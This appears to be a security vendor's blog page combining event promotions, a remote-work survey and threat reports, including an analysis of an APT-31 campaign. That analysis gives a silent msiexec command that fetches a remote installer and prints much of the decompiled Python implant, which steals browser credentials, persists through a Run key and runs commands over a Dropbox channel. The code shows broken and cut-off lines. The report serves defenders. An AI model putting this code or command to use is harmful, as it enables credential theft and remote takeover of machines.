hands-on training, virtual sessions, and real-world accounts of how organizations continue to accelerate secure digital transformation and business agility—even amidst a global pandemic. There are dozens of reasons to attend this year’s event—all of which we’ll highlight in the coming weeks. Whether you’re getting started in cloud security, you’re an experienced practitioner or network architect, or you’re an expert in DevSecOps, you will find topics to explore, sessions in which you can learn from leaders, and opportunities to connect with peers. Need more reasons to attend? Here are five: Reason one: Choose from dozens of enlightening sessions Zscaler leaders, technical experts, and industry visionaries will lead breakout sessions covering cloud foundations, the Zscaler Zero Trust Exchange, zero trust network access, SASE, network transformation, security transformation, data protection, secure application access, and enabling work-from-anywhere. Among others! No matter your role in your organization’s digital strategy, there will be tracks covering today’s trends and the topics that matter to you. Reason two: Learn from today’s top cloud innovators Enterprise CxOs will share their experiences leading secure digital transformation initiatives in their organizations, and their journeys leveraging SASE and zero trust to improve business agility, resilience, and security. Moreover, they’ll provide insights into how digital transformation is helping their organizations meet the demands of today’s mobile workforce. Reason three: Train with the industry’s best Just because this year’s event is virtual doesn’t mean you won’t get the chance to roll up your sleeves with hands-on training. Our Network and Security Essentials classes are perfect for those just getting started, while our more advanced Masters training sessions are designed for those seeking to advance their skills further on Zscaler Internet Access (ZIA) and Zscaler Private Access (ZPA). Earn up to eight CPE credits by attending a master session. Space is limited in training sessions and it tends to go fast, so be sure to pre-register so you can sign up early for training. Reason four: Engage with other cloud leaders Zenith Live 2020 gives you the opportunity to connect with and learn from industry peers from around the globe. Our Cloud-First Architect community comprises network and security architects willing to share best practices, insights, and solutions to some of the most demanding cloud transformation challenges. Reason five: Experience interactive demonstrations Zenith Live would not be complete without the opportunity for attendees to explore today’s top cloud trends, as well as some of the new, progressive technologies that will shape the future of business security, agility, and resiliency. You’ll get a chance to see the latest technologies from the Zscaler partner ecosystem, as well as the chance to test your networking and security skills in real time. Secure your spot Zenith Live 2020 will be unlike any other virtual conference. As part of the premier event dedicated to secure digital transformation, you’ll have the opportunity to connect with Zscaler leaders, customers, partners, and your peers, and we’ll even have an astronaut on hand to talk about what it really means to go beyond limits. Pre-registration is live, so don’t wait to reserve your front-row seat. See you there! David Avery is a transformation analyst at Zscaler David Avery State of Digital Transformation in EMEA: Is the Increase in Remote Work Increasing Risk? The events of 2020 caused quite a bit of upheaval for enterprises in EMEA. But what effect, if any, did it have on their digital transformation plans? Amidst the landscape of a global pandemic, increasing cyberthreats, and a growing remote workforce, Zscaler commissioned its second study on the state of digital transformation in EMEA to discover how enterprises across the U.K., Germany, France, the Netherlands, Italy, and Sweden are progressing on their transformation journeys. This year’s report finds that two-thirds of Europe’s enterprises with 3,000 or more employees run the majority of their business applications in the cloud. Nearly half of these enterprises expect the number of people working remotely to grow between 25 and 50 percent in the next year. However, only one-third of decision-makers are confident they have the infrastructure in place for secure remote access. The survey results indicate that the internet has reached the status of the new transport network where most business takes place, with the cloud as the new data centre. Close to one-fourth of enterprises were hosting more than three-quarters of their applications with a cloud provider. Italy led the way with 53 percent of its companies having moved more than half of their applications to the cloud, closely followed by the U.K., Germany, and France. Not only have business applications been migrated to the cloud, but the workforce is increasingly mobile. Fifty-three percent of European businesses have more than half of their workforce working remotely. The Netherlands leads in remote work, with 44 percent of enterprises having more than half of their staff working outside company offices, followed by Sweden and Germany. In Italy and the U.K., roughly a third of the workforce has no fixed office desk. Prior to the pandemic, enterprises were actively migrating private applications to public clouds as well as enabling some users to access applications from any location and device. In response to the global crisis, employees and enterprises further embraced this new flexible work style. Working remotely means employees have the freedom to access data from practically anywhere. But this freedom also brings challenges around mitigating business risk, as this mobile workforce can’t be supported by legacy infrastructures. IT teams must quickly enable employees to work securely from anywhere without disruption to the business. While daunting with legacy technologies, the solution is in the cloud. When location no longer matters, delivering security at the edge—close to the user—is the solution. IT decision-makers have begun to realise that transforming an organisation requires a fundamental overhaul of technology ecosystems. With apps moving to the cloud and users connecting from everywhere, the perimeter has become irrelevant and traditional hub-and-spoke networks are outdated. It’s time to decouple security from the network and deploy policies that are enforced anywhere apps reside and everywhere users connect. The survey results show that the companies moving apps to the cloud without adapting their infrastructures and security tend to struggle with complexity, performance issues, and changing security requirements. The challenges of multicloud environments The cloud is supposed to simplify enterprise infrastructure. However, with multicloud scenarios, IT decision-makers face various challenges. The most common problems cited in the survey were setting up multicloud networks and securing access to them. One-third of respondents were concerned about the rising costs of MPLS networks, which suggests that these organisations are moving applications to modern cloud environments while relying on legacy network models. Enterprises are highly likely to struggle with multicloud environments and security and access control issues if they stick to their traditional hub-and-spoke network architectures. Application, network, and security transformation must go hand in hand to avoid common challenges. Enterprises have to ask: How can the network architecture be adapted to enable seamless and secure access to multicloud environments without latency and without driving up costs and complexity? How can security requirements be matched with an architectural design so that a user no longer needs to interact manually? How can we support a large, distributed staff that needs secure access to multiple environments? Key transformation priorities should include taking full advantage of modern technology and controlling risk. The needs of today’s mobile workforce must also be taken into consideration, including a fast and frictionless experience. While securing users and applications is more important than ever, visibility across all network and connected device traffic has also become critical in defending corporate assets. The survey confirmed what most EMEA organisations already knew: Remote work is here to stay and it’s more likely to increase than decrease. Corporations should no longer differentiate between access within the corporate office and amongst remote users. In a modern workplace, secure access to business-critical applications must be identical no matter where employees are working. But the corporate mindset must change to make this a widespread reality. To learn more, download the State of Digital Transformation EMEA 2020 report. Nathan Howe is ZPA Principal Architect at Zscaler. Nathan Howe Election 2020-themed scams and threat activities The United States presidential election is here. And as COVID-19 still runs unchecked throughout the world, 2020 continues to be an outlier year in so many ways. But one thing remains constant—scammers and threat actors taking advantage of current topics for their own profit. Strangely, this is probably the most normal aspect of 2020 thus far. Cybercriminals will target users from every conceivable method possible, leveraging their email scams, SMS phishing (SMiShing), typo-squatting, domain-squatting, and malvertising in an attempt to collect sensitive information from the user or worse. With many companies operating under an indefinite work-from-home order, it’s important to keep your professional and personal devices safe and secure. Following your IT’s best practice security awareness training is still the best way to educate yourself, but real-world examples are necessary to illustrate its necessity. This being an election year, the additional outreach that most Americans are receiving from political entities creates a perfect storm of potential clickbait. Let's take a look at what the ThreatLabZ team has seen during the run-up to the election. Malware The ThreatLabZ team at Zscaler came across spam emails with embedded links where threat actors were using election lures to trick users into opening malicious PDF documents, resulting in malware execution. We have also seen a malicious PDF document show up in Google search results for “CA voter registration form”. We can see this in the screenshot below. Figure 1: This Google search result CA voter registration form returned a link to a malicious PDF. When a user clicks on the Google search result or opens the link in the email (cdn[.]shopify[.]com/s/files/1/0434/3165/7621/files/31416322246.pdf), the PDF will open and a Captcha image is presented, trying to trick the user into clicking it. Figure 2: The first page of malicious PDF claiming to be a California voter registration form. The second page of the PDF contains text claiming to provide users with information about the voter registration form. Figure 3: The second page of a malicious PDF claiming to provide information about California voter registration. Upon clicking, the PDF downloads a malware payload. The executable payload includes many junk statements in an attempt to evade analysis. Figure 4: This malware is stuffed with junk statements in an attempt to evade detection. The malware utilizes GlobalAlloc to allocate memory and then stores obfuscated shellcode at the location. Figure 5: The obfuscated shellcode of this malware. A change of permission happens using VirtualProtect and the shellcode is decoded using the loop below. Figure 6: The shellcode decode routine. The call to the decoded shellcode is seen below. Figure 7: The call to the deobfuscated shellcode. The final deobfuscated PE payload is seen below. Figure 8: The deobfuscated malicious executable payload. The Zscaler Cloud Sandbox detected this malicious executable and blocked it from reaching the end user. Below is the report for this executable payload when it was directly submitted to the Zscaler Cloud Sandbox. Figure 9: The Zscaler Cloud Sandbox report for the malware payload. Malicious redirectors We also observed domains associated with fake digital election campaign platforms, which were serving malicious redirects. The URL seen was “digitalelectioncampaign[.]com/secure/accounts/secur/list/jtgcwqhnepg2sh7r/”. When we reviewed the homepage of the website, we discovered that the site makes use of stock photos in the public speaker section trying to mislead visitors. The domain involved is known to have a bad reputation for being associated with malicious activity. Figure 10: A fake digital election campaign homepage. Figure 11: Stock photos are used on the homepage to mislead visitors into believing that they are legitimate candidates. We also found malicious JavaScript redirects being loaded by the domain. Figure 12: The malicious JavaScript redirect served by the domain. The redirected domain is malicious in nature and is found to serve trojan, adware, and malicious APK files. Keywords in domain names We also observed attempts to register typo-squatting domains of political campaigns. Users should be aware that just because a site may bear the name of a candidate, it doesn’t necessarily mean it is legitimate. Being mindful of the candidate’s actual main page will give voters the better idea of their platform and message. We have also noticed that attackers selling illegal credit card data and bank credentials are utilizing election trend keywords for their nefarious purposes. For instance, we have seen the domain trump-dumps[.]cn claiming to sell stolen credit card numbers and login credentials for banks. Figure 13: Whois information of “” Figure 14: The login page of trump-dumps[.]cn. Figure 15: The homepage of trump-dumps[.]cn with links to various types of stolen data dumps. There are also domains registered by scammers to mislead benign users to serve scam pages for monetary gain. In one instance, we found “voterlist[.]info” domain redirecting the users to fake Microsoft tech support pages. Figure 16: Whois information for voterlist[.]info. The domain redirecting users to fake Microsoft tech support scams websites. It uses JavaScript to capture mouse controls and trick users into believing their machines are infected. Figure 17: The redirection chain of voter-list[.]info, leading to tech support scam page. Figure 18: The voterlist[.]info serving fake tech support scam page. Newly registered domains Threat actors and scammers have always taken advantage of recent trends by registering domains based on the latest keyword trends. As the 2020 presidential election is one of the top trending events, The ThreatLabZ team has been actively monitoring newly registered domains (NRDs) based on election trends and keywords for the past three months. Figure 19: The NRD count seen during the past 10 weeks based on election-related keywords. Here is the list of a few of the election keywords and/or their variations that we monitored against NRDs. Figure 20: The list of monitored election keywords (found in NRDs). We also looked at the type of content served by these NRDs. Figure 21: The type of content served by election-related NRDs Let's take a closer look at each of these: Valid: We noticed that a good section of the NRDs serving valid content are related to selling merchandise for specific election campaigns. Parked: We noticed that a significant percentage of the NRDs are currently parked (that means being held for later use). Invalid: Domains that do not resolve to any IP address. Open directories As we analyzed some of these live websites, there were several instances of suspicious or malicious content being hosted on these election-related NRDs. We will take a look at some of the recent examples. Fake Surveys We observed instances of fake polling surveys targeted around presidential candidates. These are usually amateur polls or polls designed to redirect users to unofficial merchandise websites once the user chooses an option. Below we can see one such amateur polling site, which was hosted on a vulnerable server containing open directory and outdated software. Figure 22: A fake polling website. While the site appears to be legitimate, the hosting infrastructure has been repeatedly flagged for hosting phishing pages (most recently, a Costco phishing campaign). Another trick that scammers use to lure users to their fake merchandise websites is by publishing ads on Google search results and claiming to be the official websites. Figure 23: A Google search result for candidate's merchandise website. Figure 24: An inactive suspicious merchandise website. Figure 25: An inactive merchandise website. On reviewing the site, we see that it is suspicious in nature. We see the logo design has mistakes and the most recent visit to the website showed that the website is down and inactive. We also observed some disinformation campaigns targeting presidential candidates. Figure 26: Websites promoting unverified information and parody websites. Everyone should be careful to validate all sites they visit and only use information from official sources. Conclusion The Zscaler ThreatLabZ team is actively monitoring these campaigns to ensure coverage for Zscaler customers. We recommend that users take extra care in the sites they visit and, in particular, use caution when clicking links or opening email messages from untrusted sources. Here are a few official voting sites you can visit, as well as tips for safe internet searching. Visit for information on how you can vote. Visit for more information about your state’s election office if you have questions. Verify the authenticity of a URL or website before accessing it. Be wary of links with typos. Check for HTTPS/secure connections when visiting official websites. All legitimate candidates and donation portals use HTTPS connections for their transactions. Don't click links or open documents from unknown parties. Avoid visiting URL-shortened links. Ensure that your operating system and web browser are up to date and have the latest security patches installed. Avoid using public or unsecured Wi-Fi connections if any voting registration information is to be exchanged online. Don’t trust e-mails asking for voter registration details. The election office will always mail ballot information to your address. It will contain instructions to receive information electronically if available. Never provide personally identifying information to any SMS, e-mail, or website asking for voter information. If you have questions about specific issues that will be on your county ballot, you can visit and get a Voter Guide. Monitor US-Cert for information about ongoing attempts to fraud voters: Report incidents to the FTC. Rohit Hegde Zenith Live 2020 Speaker Profile: Mike Towers, CISO, Takeda Pharmaceutical Company Mike Towers will speak on the main stage December 9 at the Zscaler virtual cloud summit Zenith Live 2020 - Americas Conference. Two events solidified Mike Towers' commitment to secure digital transformation. The first was a merger: In early 2019, his company Takeda Pharmaceutical Company acquired Shire PLC, effectively doubling the size of the company. CISO Towers found himself having to integrate an incongruous patchwork of network hardware technologies. Takeda had begun rolling out Zscaler Internet Access (ZIA), ostensibly to secure employee internet access via the cloud. But ZIA proved particularly valuable for integrating what Towers calls "quite-disjointed" network architectures after the merger. While ZIA helped Towers consolidate IT systems after the Shire acquisition, and provided greater flexibility in enabling secure employee connectivity, it was Zscaler Private Access (ZPA) that helped the Tokyo-based pharmaceutical giant preserve business continuity in 2020. Today when he considers VPNs, Towers asks rhetorically, “What’s the point?” As he puts it, “We can provide that same level of assurance and control natively in the cloud. We want to remove as much friction as possible.” Zscaler helps Takeda remove that friction. “With the combo of ZIA and ZPA, we’re much more flexible with what we can provide and since we’re running all our traffic through it, we know it can scale,” concludes Towers. “This is a good time to be a security professional because you don’t have to worry about trying to balance user experience and security anymore. You can do both!” Get the full story from Takeda Pharmaceutical Company CISO Mike Towers on the main stage at Zenith Live 2020. This year, the world’s premier cloud summit goes virtual and free December 8-10. You’ll get the opportunity to engage with Mike Towers and IT leaders from Carrier, Cushman & Wakefield, Royal Caribbean Group, Siemens, DB Schenker, and many more. Mike Towers shared Takeda’s digital transformation story in the book Securing Remote Work - Safeguarding Business Continuity with Zscaler, from which some of this article is excerpted. Toph Whitmore APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services Recently, Zscaler's ThreatLabZ team discovered several malicious MSI installer binaries that were hosted on attacker-controlled GitHub accounts and distributed in-the-wild in August 2020. These MSI binaries dropped and displayed decoy content using a theme around a COVID-19 vaccine as a social engineering technique. After further analysis of these MSI binaries, we gathered sufficient intel from the code base and attack flow to correlate it to the Chinese state-sponsored threat actor APT 31. In this blog, we will share details of the attack flow, threat attribution, correlation between various instances of attacks by this threat actor, and an in-depth technical analysis of the payloads involved. We will conclude our analysis by sharing indicators of compromise (IOCs), useful metadata, and the complete decompiled Python script, which was the main payload involved in these attacks. Distribution strategy The threat actor in this case leverages legitimate online services end-to-end in the infection chain in order to blend in with benign traffic and evade network security controls. The infection chain starts with an email in which the victim receives a download link that fetches the first-stage downloader. As we found in our analysis, this first-stage downloader is responsible for fetching a malicious MSI file hosted on an attacker-controlled GitHub page. This MSI file is downloaded and executed on the endpoint. As a result, a malicious Python-compiled binary is dropped on the file system, which uses the Dropbox API for command-and-control (C&C) communication. Based on the metadata of the dropped binary, we observed that attackers were spoofing legitimate application names related to popular online services such as Microsoft OneDrive. While we did not obtain the first-stage downloader for this attack, we were able to reconstruct the attack flow based on the tactics, techniques, and procedures (TTPs) used by this threat actor in the past with a similar attack flow. Figure 1 shows the entire reconstructed attack flow. Figure 1: Reconstructed entire attack flow To make the attack more convincing, attackers leveraged a social engineering technique by displaying decoy content to the user. This decoy content, as we describe in the later sections of the blog, is related to themes of interest for the targeted victims. Threat attribution We correlated all the instances of attacks described in this blog to the same threat actor based on the following indicators. The attack flow is similar in all cases. The use of legitimate attacker-controlled GitHub accounts to host malicious MSI files with spoofed file extensions. The use of Dropbox API for command-and-control (C&C) communication. The MSI wrapper used to convert the EXE to MSI file format. PyInstaller used to compile the Python script to the final payload. Decompiled Python script using the same AES encryption key and sharing of code base. The name of artifacts such as Windows Run registry key used to create persistence on the machine. In October 2020, Google’s Threat Analysis Group (TAG) attributed an attack using a similar payload to APT-31 in its report here. While Google’s report did not share any technical analysis details for the payload, we were able to correlate the codebase to the Python-compiled binary highlighted by them. All the indicators mentioned above were shared by the samples in our report. Upon further research, we discovered a report of an attack using Hong Kong pro-democracy protest themes in October 2019. There is considerable overlap between the malware distribution strategy and the payload indicators in this report and the samples we discovered. Therefore, we can confidently attribute the attack discussed in this blog to APT-31. Decoy contents In this section, we share details of the decoy documents that were displayed to the user as a social engineering technique as the malicious payload executed in the background. MD5 hash of MSI file: 077ebc3535b38742307ef1c9e3f95222 Decoy Filename: PAPER-COVID-19-Vaccine-Strategy.pdf Figure 2 shows the contents of this decoy document, which discusses a COVID-19 vaccine strategy specifically for New Zealand government authorities. Threat actors obtained the original source of this document here. Figure 2: Decoy document related to the New Zealand government's COVID-19 vaccine strategy MD5 hash of MSI file: f3896d4a29b4a2ea14ea8a7e2e500ee5 Decoy Filename: covid_19_vaccines_final.pdf Figure 3 shows the contents of this document, which describes various initiatives related to COVID-19 vaccines. It pretends to be from the “Treatment Action Group.” Figure 3: Contents of the decoy document (from "Treatment Action Group"). MD5 hash of MSI file: b4112b0700be2343422c759f5dc7bb8b Decoy Filename: FINAL__-COVID-Vaccine-Letter.pdf Figure 4 shows the contents of a document that pretends to be from the National Indian Health Board and discusses the COVID-19 vaccine distribution with a focus on pandemic relief packages. Figure 4: Contents of vaccine distribution document which pretends to be from the National Indian Health Board. MD5 hash of MSI file: daa7045a5c607fc2ae6fe0804d493cea Decoy filename: 200709-The-Publics-Role-in-COVID-19-Vaccination.pdf Figure 5 shows the contents of a document that pretends to be from a working group involving John Hopkins Bloomberg School of Public Health and Texas State Anthropology discussing the public’s role in the COVID-19 vaccination. Figure 5: Decoy document related to the public's role in a COVID-19 vaccination Technical analysis Since there are multiple stages involved in the infection chain, we will describe each component in detail in this section. MSI file For the purpose of technical analysis, we will consider the MSI file with MD5 hash: f3896d4a29b4a2ea14ea8a7e2e500ee5 MSI is an installer package file format used by Microsoft Windows. Microsoft Windows provides an msiexec utility that provides the means to install, modify, and perform operations on MSI files. The threat actor in this case hosted the MSI file on GitHub using a spoofed file extension to look like a PDF. Due to the use of this fake file extension (*.pdf) and the intel we gathered about this threat actor from previous tactics, techniques, and procedures (TTPs) in the report, we concluded that there was a first-stage payload involved that was used to fetch the MSI file from GitHub and execute it using the msiexec.exe command-line utility. In this threat actor's 2019 activity, an LNK file was used to fetch the MSI binary from GitHub and execute it using the following command line: C:\Windows\System32\msiexec.exe /q /i <github_URL> It is worth noting that in 2019, this actor used a fake file extension (*.png) for the MSI binary hosted on the attacker-controlled GitHub account. Based on this similarity, we are confident that a first-stage payload was involved that downloads and executes the MSI files. All the MSI files were created using MSI Wrapper software, which helps to convert an executable file to an MSI file. With an MSI Wrapper, you can include other files in the same MSI package and execute them along with the main executable. Figure 6 shows the MSI Wrapper flash screen displayed to the user upon execution. Figure 6: MSI Wrapper flash screen displayed to the user. Upon execution, the MSI binary drops and executes the main payload, which is a python-compiled binary and also opens the dropped decoy PDF file which is displayed to the user. Python-compiled binary The MSI file described above will drop a Python-compiled binary in the Appdata\Roaming directory, which is used to perform further malicious activities. MD5 hash: bd26122b29ece6ce5abafb593ff7b096 Filename: OneDrive.exe For the purpose of social engineering, the threat actor chose file names related to legitimate online services, including Microsoft OneDrive. In a few instances, we observed the use of file names resembling McAfee’s endpoint security product. Even the file icons for these binaries are selected to masquerade as the corresponding legitimate applications. Since this binary used the PyInstaller packager to compile the Python script to a standalone executable, we can extract the compiled Python script (*.pyc) from this package and use a decompiling tool such as uncomplye6 to decompile its contents. The complete decompiled script is included in Appendix I. Below are some of the key functionalities of the binary. 1. Check and use the proxy configuration: Check if the proxy is configured using registry value “ProxyEnable” which is located under registry key “Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings”. If successful then the proxy server information is obtained using the registry value “ProxyServer” under the same registry key. Later this proxy server is used for all the C&C communication. 2. Browser credential stealing: Capability to steal credentials (username and password) from the installed browsers, Microsoft Internet Explorer (MSIE), and Google Chrome browser. Figures 7 and 8 show the code sections responsible for stealing the credentials from MSIE and Chrome browser respectively. Figure 7: Code section used to steal MSIE credentials. Figure 8: Code section used to steal Chrome browser credentials. 3. Persistence: Creates a Windows RUN registry key for persistence. The name of the key is: "Dropbox Update Setup". This name was consistent in all the samples. This key points to the location of the Python-compiled binary in the %appdata% directory to ensure that it is started automatically each time the system is rebooted. 4. Bot identifier generation: Generates a unique ID (uuid) for the machine, which is used to register the bot with the attacker's C&C server. uniqueid = str(uuid.uuid5(uuid.NAMESPACE_DNS, str(uuid.getnode()))) 5. Registration of bot: Collects the following information from the machine to register the bot with the C&C server. System information - Details of processor architecture. Current timestamp - Format: %Y-%m-%d %H:%M:%S System name Username of the machine Collects this information in JSON format, AES encrypts it and sends it to the attacker's server using Dropbox API. 6. Command-and-control activities: After registering the bot with attacker's server, it will check for new jobs by querying the Dropbox API endpoint: There are three main commands supported in the script: a) upload b) download c) cmd: A system command which needs to be executed on the endpoint. Python script will execute this using subprocess.Popen() The results will be stored in a JSON format, AES-encrypted and sent as an attachment using the Dropbox API. JSON format: {u'sys': getSysinfo(), u'date': getdate(), u'pcname': getComputername(), u'user': getUser(), u'file': self.attachment, u'msg': self.text} Here, text indicates the output of the command executed on the endpoint. The filename format used is: back#<unique_id>#<job_id>#.txt Zscaler Cloud Sandbox detection Figure 9 shows the sandbox detection for the final payload which is a Python-compiled binary. Figure 9: Zscaler Cloud Sandbox detection. Conclusion The threat actor, APT-31, quickly leverages current themes, such as COVID-19, or political themes of interest to the victim as a social engineering technique to infect their machines. By abusing legitimate services such as GitHub, Google Drive, and Dropbox in the infection chain, end-to-end, this threat actor manages to evade network security solutions. As always, users should be cautious when receiving emails out of the blue, even if those emails appear to be related to something you are interested in, such as information about a COVID-19 vaccine. The Zscaler ThreatLabZ team will continue to monitor this campaign, as well as others, to help keep our customers safe. MITRE ATT&CK table ID Tactic Technique T1566.002 Spearphishing Link Email body contains link to attacker hosted file T1204.002 User Execution: Malicious File User downloads and open the attacker hosted file T1059.003 Windows command shell Executes the commands fetched from C2 T1140 Deobfuscate/Decode Files or Information Strings and other data are obfuscated in the payload T1547.001 Registry Run Keys/Startup Folder Create Run registry key for persistence T1555.003 Credentials from Web Browsers Steals credentials from Explorer and Chrome browser T1082 System Information Discovery Sends processor architecture and computer name T1083 File and Directory Discovery Upload file from the victim machine T1033 System Owner/User Discovery Sends the username of the current logged in user T1124 System Time Discovery Sends the system current time T1005 Data from Local System Upload file from victim machine T1132.001 Standard Encoding Uses AES encryption for c2 communication T1090.001 Internal Proxy Uses user configured proxy information from registry if available T1567.002 Exfiltration to Cloud Storage Data is uploaded to dropbox via api Indicators of Compromise Host-based indicators: MD5 Hashes of MSI files 077ebc3535b38742307ef1c9e3f95222 f3896d4a29b4a2ea14ea8a7e2e500ee5 b4112b0700be2343422c759f5dc7bb8b daa7045a5c607fc2ae6fe0804d493cea 3347a1409f0236904beaceba2c8c7d56 MD5 Hashes of Python-compiled binaries bd26122b29ece6ce5abafb593ff7b096 fc4995e931f0ff717fe6a6189f07af64 Dropped Python-compiled binary file names OneDrive.exe siHostx64.exe Dropped decoy file names mcafee_trial_setup_433.0207.3919_key.exe PAPER-COVID-19-Vaccine-Strategy.pdf covid_19_vaccines_final.pdf FINAL__-COVID-Vaccine-Letter.pdf 200709-The-Publics-Role-in-COVID-19-Vaccination.pdf LNK file metadata analysis # This LNK was used by the threat actor in 2019 LNK file MD5 hash: 817837e0609b5bdade503428dd17514e # LNK file was generated inside a VMWare virtual machine by the attacker # These details were extracted from the LNK file using the LECmd tool. Tracker database block Machine ID: desktop-fe0haua MAC Address: 00:0c:29:51:de:79 MAC Vendor: VMWARE Creation: 2019-10-29 02:05:30 Network-based indicators Github URL hosting MSI file: hxxps:// hxxps:// Attacker-controlled Github account names: yandexmcf1 protonshshll References Appendix 1 Python decompiled code # The decompiled Python code is consistent among all the samples. The only change we observed was in the access token. Even the AES encryption key is shared between all the samples. import requests, json, win32cred, sqlite3, win32crypt, subprocess, sys, os, threading, time, platform, uuid, base64, time from Crypto import Random from Crypto.Cipher import AES from _winreg import * time.sleep(480) access_token = 'XAdmrYKoIiAAAAAAAAAADSEB3W3JCY6-pc1tD0zTp2upliDsO9vNrjfjIDJae_Ii' api_url = '' content_url = '' respath = '/res' jobpath = '/job' respath_s = '/res/' jobpath_s = '/job/' proxies = {} uniqueid = str(uuid.uuid5(uuid.NAMESPACE_DNS, str(uuid.getnode()))) BS = 16 pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) unpad = lambda s: s[0:-ord(s[(-1)])] class AESCipher: def __init__(self): self.key = 'ApmcJue1570368JnxBdGetr*^#ajLsOw' def encrypt(self, raw): raw = pad(raw) iv = cipher =, AES.MODE_CBC, iv) return base64.b64encode(iv + cipher.encrypt(raw)) def decrypt(self, enc): enc = base64.b64decode(enc) iv = enc[:16] cipher =, AES.MODE_CBC, iv) return unpad(cipher.decrypt(enc[16:])) aesciper = AESCipher() class regthread(threading.Thread): def __init__(self): threading.Thread.__init__(self) self.tempdir = os.getenv('AppData') self.fileName = sys.argv[0] self.regpath = os.path.join(self.tempdir, os.path.basename(self.fileName)) self.runs = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run' = 'Dropbox Update Setup' self.daemon = False self.start() def run(self): os.popen('copy %s %s /y' % (self.fileName, self.tempdir)) key = OpenKey(HKEY_CURRENT_USER, self.runs) while True: runkey = [] try: i = 0 while True: subkey = EnumValue(key, i) runkey.append(subkey[0]) i += 1 except Exception as e: pass if not in runkey: time.sleep(10) try: key = OpenKey(HKEY_CURRENT_USER, self.runs, 0, KEY_ALL_ACCESS) SetValueEx(key,, 0, REG_SZ, self.regpath) key.Close() except Exception as e: pass time.sleep(10) def get_proxyserver(): try: aReg = ConnectRegistry(None, HKEY_CURRENT_USER) aKey = OpenKey(aReg, 'Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings') subCount, valueCount, lastModified = QueryInfoKey(aKey) for i in range(valueCount): n, v, t = EnumValue(aKey, i) if n == 'ProxyServer': if ';' in v: slist = v.split(';') for i in slist: if 'http=' in i: server = i.split('=')[1] else: server = '' elif '=' in v: server = v.split('=')[1] else: server = v CloseKey(aKey) return server except Exception as e: return '' return def check_proxy(): try: aReg = ConnectRegistry(None, HKEY_CURRENT_USER) aKey = OpenKey(aReg, 'Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings') subCount, valueCount, lastModified = QueryInfoKey(aKey) for i in range(valueCount): n, v, t = EnumValue(aKey, i) if n == 'ProxyEnable': isproxy = v CloseKey(aKey) return isproxy except Exception as e: return 0 return def get_ie_creds(server): proxycreds = [] if ':' in server: server = server.split(':')[0] try: creds = win32cred.CredEnumerate(None, 1) for i in creds: if server in i['TargetName']: user = i['UserName'] passwd = i['CredentialBlob'].replace('\x00', '') dic = {user: passwd} proxycreds.append(dic) return proxycreds except Exception as e: return proxycreds return def get_chrome_creds(server): path = os.getenv('APPDATA') + '\\..\\Local\\Google\\Chrome\\User Data\\Default\\Login Data' creds = [] if ':' in server: server = server.split(':')[0] try: conn = sqlite3.connect(path) cursor = conn.cursor() cursor.execute('SELECT action_url, username_value, password_value FROM logins') data = cursor.fetchall() if len(data) > 0: for result in data: if result[0] == server: password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] if password: dic = {result[1]: password} creds.append(dic) return creds except Exception as e: return creds return def check_cred(server, creds): global proxies pro = {} url = '' if server: if creds: for userdic in creds: for user in userdic: pro['http'] = 'http://' + user + ':' + userdic[user] + '@' + server pro['https'] = 'https://' + user + ':' + userdic[user] + '@' + server r = requests.get(url, proxies=pro) if r.status_code == 200: proxies = pro return 1 else: pro['http'] = 'http://' + server pro['https'] = 'https://' + server r = requests.get(url, proxies=pro) if r.status_code == 200: proxies = pro return 1 return 0 def do_post(url, headers, data, proxy): if proxy: r =, headers=headers, data=data, proxies=proxies) if 'download' in url: return r.content if 'upload' in url: return r.content return json.loads(r.content) else: r =, headers=headers, data=data) if 'download' in url: return r.content if 'upload' in url: return r.content return json.loads(r.content) def search(path, query, proxy): headers = {'Authorization': 'Bearer ' + access_token, 'Content-Type': 'application/json'} data = {'path': path, 'query': query, 'mode': {'.tag': 'filename'}} r = do_post(api_url + 'search', headers, json.dumps(data), proxy) return r def download(filepath, proxy): headers = {'Authorization': 'Bearer ' + access_token, 'Dropbox-API-Arg': '{"path":"%s"}' % filepath} r = do_post(content_url + 'download', headers, '', proxy) return r def upload(data, filepath, proxy): headers = {'Authorization': 'Bearer ' + access_token, 'Content-Type': 'application/octet-stream', 'Dropbox-API-Arg': '{"path":"%s"}' % filepath} r = do_post(content_url + 'upload', headers, data, proxy) return r def delete(filepath, proxy): headers = {'Authorization': 'Bearer XAdmrYKoIiAAAAAAAAAADSEB3W3JCY6-pc1tD0zTp2upliDsO9vNrjfjIDJae_Ii', 'Content-Type': 'application/json'} data = {'path': filepath} r = do_post(api_url + 'delete', headers, json.dumps(data), proxy) return r class Download(threading.Thread): def __init__(self, jobid, filepath, proxy): threading.Thread.__init__(self) self.jobid = jobid self.filepath = filepath self.daemon = True self.proxy = proxy self.start() def run(self): try: if os.path.exists(self.filepath) is True: Sendmsg({u'cmd': u'download', u'res': u'Download file success...'}, self.proxy, self.jobid, self.filepath) else: Sendmsg({u'cmd': u'download', u'res': u'Path to file invalid'}, self.proxy, self.jobid) except Exception as e: Sendmsg({u'cmd': u'download', u'res': (u'Failed: {}').format(e)}, self.proxy, self.jobid) class Upload(threading.Thread): def __init__(self, jobid, dest, attachment, proxy): threading.Thread.__init__(self) self.jobid = jobid self.dest = dest self.attachment = attachment self.daemon = True self.proxy = proxy self.start() def run(self): try: file_content = download(jobpath_s + self.attachment, self.proxy) fopen = open(self.dest, 'wb+') fopen.write(file_content) fopen.close() Sendmsg({u'cmd': u'upload', u'res': u'Upload file success ,saved to %s' % self.dest}, self.proxy, self.jobid) except Exception as e: Sendmsg({u'cmd': u'upload', u'res': (u'Upload file Failed: {}').format(e)}, self.proxy, self.jobid) class execCmd(threading.Thread): def __init__(self, command, jobid, proxy): threading.Thread.__init__(self) self.command = command self.jobid = jobid self.daemon = True self.proxy = proxy self.start() def run(self): try: proc = subprocess.Popen(self.command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) stdout_value = unicode(, errors='ignore') stdout_value += unicode(, errors='ignore') Sendmsg({'cmd': self.command, 'res': stdout_value}, self.proxy, jobid=self.jobid) except Exception as e: pass def getdate(): return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) def getUser(): return os.environ.get('USERNAME') def getComputername(): return 